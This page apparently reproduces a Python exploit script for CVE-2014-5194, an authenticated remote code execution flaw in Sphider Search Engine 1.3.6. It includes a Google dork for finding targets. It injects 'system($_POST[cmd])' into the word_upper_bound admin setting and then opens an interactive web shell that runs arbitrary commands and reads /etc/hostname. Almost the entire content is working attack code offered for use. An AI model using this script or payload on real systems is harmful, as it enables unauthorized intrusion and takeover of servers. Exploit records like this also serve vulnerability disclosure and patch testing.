扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 |
# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated) # Google Dork: intitle:"Sphider Admin Login" # Date: 2014-07-28 # Exploit Author: Gurkirat Singh # Vendor Homepage: http://www.sphider.eu/ # Software Link: http://www.sphider.eu/sphider-1.3.6.zip # Version: v1.3.6 # Tested on: Windows and Linux # CVE : CVE-2014-5194 # Proof of Concept: https://www.exploit-db.com/exploits/34189 from argparse import ArgumentParser, RawTextHelpFormatter from huepy import * import string import random from bs4 import BeautifulSoup, Tag from requests import Session from randua import generate as randua _F = "".join(random.choices(string.ascii_letters, k=13)) parser = ArgumentParser(description="Exploit for CVE-2014-5194", formatter_class=RawTextHelpFormatter) parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t") parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u") parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p") parser.add_argument("--debug", help="if passed, spawn the firefox window", default=True, action="store_false") parser.add_argument("--timeout", help="timeout in seconds (default: 1)", dest="T", metavar="", default=1) args = parser.parse_args() if args.t.endswith("/"): args.t = args.t[:-1] print(run("Logging in")) with Session() as http: data = {"user": args.u, "pass": args.p} headers = {"User-Agent": randua()} http.post(args.t + '/admin/auth.php', data=data, headers=headers, allow_redirects=False) r = http.get(args.t + '/admin/admin.php', headers=headers, allow_redirects=False) html = BeautifulSoup(r.content.decode(), "lxml") title: Tag = html.find("title") if title.text == "Sphider Admin Login": print(bad("Failed to login")) exit(1) else: print(good("Logged in")) payload = { 'f': 'settings', 'Submit': '1', '_version_nr': '1.3.5', '_language': 'en', '_template': 'standard', '_admin_email': 'admin@localhost', '_print_results': '1', '_tmp_dir': 'tmp', '_log_dir': 'log', '_log_format': 'html', '_min_words_per_page': '10', '_min_word_length': '3', '_word_upper_bound': '100;system($_POST[cmd])', '_index_numbers': '1', '_index_meta_keywords': '1', '_pdftotext_path': 'c:\\temp\\pdftotext.exe', '_catdoc_path': 'c:\\temp\\catdoc.exe', '_xls2csv_path': 'c:\\temp\\xls2csv', '_catppt_path': 'c:\\temp\\catppt', '_user_agent': 'Sphider', '_min_delay': '0', '_strip_sessids': '1', '_results_per_page': '10', '_cat_columns': '2', '_bound_search_result': '0', '_length_of_link_desc': '0', '_links_to_next': '9', '_show_meta_description': '1', '_show_query_scores': '1', '_show_categories': '1', '_desc_length': '250', '_did_you_mean_enabled': '1', '_suggest_enabled': '1', '_suggest_history': '1', '_suggest_rows': '10', '_title_weight': '20', '_domain_weight': '60', '_path_weight': '10', '_meta_weight': '5' } print(run("Exploiting")) http.post(args.t + "/admin/admin.php", data=payload) r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F}) if r.content.decode().strip() != _F: print(bad("Failed")) exit(1) print(good("Exploited")) print(info("Spawning Shell")) user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"}) host = http.post(args.t + "/settings/conf.php", data={"cmd": "cat /etc/hostname"}) shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" while True: try: cmd = input(shell) if cmd == "exit": break r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd}) print(r.content.decode().strip()) except: break print() |
体验盒子
